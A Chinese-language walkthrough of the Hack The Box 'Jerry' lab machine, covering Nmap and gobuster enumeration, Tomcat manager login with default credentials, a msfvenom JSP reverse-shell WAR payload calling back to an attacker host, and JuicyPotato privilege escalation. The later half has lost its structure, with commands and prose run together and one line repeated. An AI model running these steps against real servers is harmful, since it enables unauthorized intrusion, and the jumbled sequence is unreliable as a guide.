您好,登录后才能下订单哦!
密码登录
登录注册
点击 登录注册 即表示同意《亿速云用户服务条款》
# HTB的Jerry渗透测试是什么
## 引言
Hack The Box(HTB)是一个广受欢迎的在线渗透测试平台,Jerry是其入门级Windows靶机之一。本文将从环境配置、渗透流程、漏洞利用到权限提升,详细解析Jerry靶机的完整渗透过程,帮助初学者理解基础渗透测试方法论。
---
## 一、HTB平台与Jerry靶机概述
### 1.1 HTB平台特点
- **实战化学习环境**:提供模拟真实漏洞的虚拟靶机
- **难度分级系统**:从Beginner到Insane的六级难度体系
- **社区协作机制**:支持用户交流解题思路(论坛/Discord)
### 1.2 Jerry靶机基础信息
| 属性 | 详情 |
|-------|------|
| 难度评级 | Easy |
| 操作系统 | Windows Server 2012 |
| 暴露服务 | Apache Tomcat 8.5.14 |
| 核心漏洞 | 默认凭证部署漏洞 |
---
## 二、渗透测试环境准备
### 2.1 必要工具清单
- **网络扫描**:Nmap
- **漏洞利用**:Metasploit Framework
- **Web分析**:Burp Suite
- **密码破解**:John the Ripper
### 2.2 VPN连接配置
```bash
sudo openvpn your-lab-connection.ovpn
ping <Jerry_IP> # 测试连通性
nmap -sV -Pn -T4 <target_IP>
扫描结果分析:
8080/tcp open http Apache Tomcat 8.5.14
http://<IP>:8080
发现Tomcat管理页面gobuster dir -u http://<IP>:8080 -w /usr/share/wordlists/dirb/common.txt
通过Tomcat文档发现常见默认凭证:
admin:admin
tomcat:s3cret
tomcat:s3cret
成功登录/manager/html
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your_IP> LPORT=4444 -f war > shell.war
/shell
触发连接获取的Tomcat服务账户权限有限,需进行提权:
whoami /all # 显示当前权限
systeminfo # 收集系统信息
python windows-exploit-suggester.py --database 2023-04-20-mssb.xls --systeminfo systeminfo.txt
JuicyPotato.exe -t * -p C:\Windows\System32\cmd.exe -l 1337
”`
注:实际测试时请确保获得合法授权,本文仅用于教育目的。完整渗透过程视频可在HTB官方YouTube频道找到演示。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。